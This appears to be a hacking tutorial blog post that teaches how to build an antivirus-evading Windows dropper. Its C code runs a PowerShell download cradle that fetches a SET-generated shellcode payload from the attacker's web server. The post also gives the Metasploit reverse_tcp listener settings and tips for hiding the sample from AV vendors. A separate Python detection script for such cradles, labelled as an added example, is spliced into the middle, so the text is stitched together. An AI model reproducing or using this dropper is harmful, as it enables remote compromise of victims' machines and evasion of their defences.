How to Bypass Antivirus Using Powershell and Metasploit (Kali Tutorial)
So you want to create a Meterpreter virus, but you keep getting caught by AV. How do you create one that will go undetected? In this tutorial, I'll teach you how to code your own simple virus that downloads a PowerShell payload from an Apache web server and executes it, bypassing antivirus.
- Kali Linux
- A C compiler (I use gcc on Windows; I can't seem to get the Kali version working)
- The Social Engineering Toolkit (preinstalled on Kali)
- An Apache web server (preinstalled on Kali)
- The Metasploit Framework (also preinstalled on Kali)
We'll be using the Social Engineering Toolkit to create our PowerShell payload. To open it, type this in a terminal:
From there, type 1 for "Social-Engineering Attacks", then 9 for "Powershell Attack Vectors", and finally 1 for "Powershell Alphanumeric Shellcode Injector".
Now you'll need to provide an "LHOST". If you didn't already know, this is your attacker machine's local IP address (as long as you're attacking over a local area network). To determine it, open a new terminal window and type in:
Scroll up to the top to find the interface that's connected to your network (in my case, that's "eth0"). Find what I've highlighted, "inet", and next to it you'll find your local IP address (in my case, it's 10.0.0.13). This is what you'll input for your LHOST.
Next, it'll prompt you to type in a "port for the reverse". This is referring to the "LPORT". Usually I use "4444", as it's a Meterpreter convention, but you can use any port you want as long as you remember it.
Then it will ask whether you want to "start the listener now". Type "no"; we'll do this manually later. For now we're done with SET.
Now we'll need to move that payload over to our Apache web server. To do so, open a terminal and type:
mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/html/payload.txt
However, if you're still using Kali Linux 1 (not 2), use this command:
mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/payload.txt
This is because, in Kali Linux version 2, the Apache document root was moved to the "html" folder inside /var/www/.
Now, simply type:
service apache2 start
...and your web server should be started.
To create the virus, I'm using Windows Notepad and MinGW's "gcc". The code for the virus is as follows:
system("powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.13/payload.txt'))\"");
Remember to change "10.0.0.13", as your LHOST (or local IP address) will likely be different.
Save this as "evil.c", then compile it using your favorite C compiler. In my case, I'm using gcc, so I type:
gcc.exe D:\Hacking\evil.c -o D:\Hacking\evil.exe
Now we have our FUD ("fully undetectable") executable.
Lastly, we need to set up a listener to wait for a Meterpreter session. Fire up the Metasploit Framework by typing:
Once it loads, type:
Now you'll need to set a series of options, so I'll list them out for you:
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 10.0.0.13
- set LPORT 4444
Again, remember to change LHOST to your local IP address, and change LPORT if you used something other than 4444.
Finally, type "exploit" and hit Enter to start the listener. As soon as your victim runs the "evil.exe" virus, you'll get a session.
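From the defender's side, the chain this tutorial produces is easy to spot in process-creation telemetry: evil.exe calls system(), which runs cmd.exe /c, which launches powershell.exe with an IEX download cradle over Net.WebClient.DownloadString. The following Python is an added example (not part of the original post) that flags that cradle in a few constructed Sysmon-style Event ID 1 records; the event layout, parent processes and URLs are made-up sample data.

```python
import ntpath
import re
from typing import Dict, List, Optional

# Constructed process-creation records in a Sysmon Event ID 1 layout (sample data,
# not from a real host). The first one mirrors the tutorial's dropper: cmd.exe
# (spawned by system()) launching the PowerShell download cradle.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe \"IEX ((new-object net.webclient)"
                    ".downloadstring('http://10.0.0.13/payload.txt'))\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Users\alice\Downloads\invoice.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden Invoke-Expression (New-Object "
                    "System.Net.WebClient).DownloadString(\"https://files.example.net/s.txt\")"},
]

# All three pieces of the cradle must be present: an expression evaluator,
# the WebClient class and DownloadString. Matching is case-insensitive because
# PowerShell is, and 'System.' is optional because the type name can be abbreviated.
CRADLE_PARTS = [
    re.compile(r"\b(iex|invoke-expression)\b", re.I),
    re.compile(r"(system\.)?net\.webclient", re.I),
    re.compile(r"\.downloadstring\s*\(", re.I),
]
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


def is_powershell(image: str) -> bool:
    """True when the created process is a PowerShell host binary."""
    return ntpath.basename(image).lower() in ("powershell.exe", "pwsh.exe")


def classify(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return a finding for a PowerShell download cradle, or None for benign events."""
    if not is_powershell(event["Image"]):
        return None
    cmd = event["CommandLine"]
    if not all(part.search(cmd) for part in CRADLE_PARTS):
        return None
    url = URL_RE.search(cmd)
    return {"rule": "powershell_download_cradle",
            "parent": event["ParentImage"],
            "url": url.group(0) if url else "",
            # Plain HTTP is worth its own note: the staged payload crosses the
            # network unencrypted and can be captured and inspected verbatim.
            "plaintext_http": str(bool(url and url.group(0).lower().startswith("http://")))}


def scan(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run classify() over a batch of events and keep the findings."""
    return [f for f in (classify(e) for e in events) if f is not None]
```

Pairing this with the parent process (cmd.exe launched by an unsigned binary in a user-writable path) and a network rule for the outbound fetch of payload.txt gives two more independent detection points for the same chain.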
If you want to check your executable against antiviruses, I recommend against using VirusTotal. This is because they submit their signatures to antivirus companies, increasing the likelihood of your executable being detected. Instead, I personally use nodistribute.com because, if they're keeping to their word, the signatures aren't being submitted. Here are the results for my executable if you're interested:
I hope you found my post useful and easy to follow. As this is my first post here (or anywhere, for that matter), I would really appreciate any feedback on what I could do better. Anyways, thanks for reading my post, and good luck!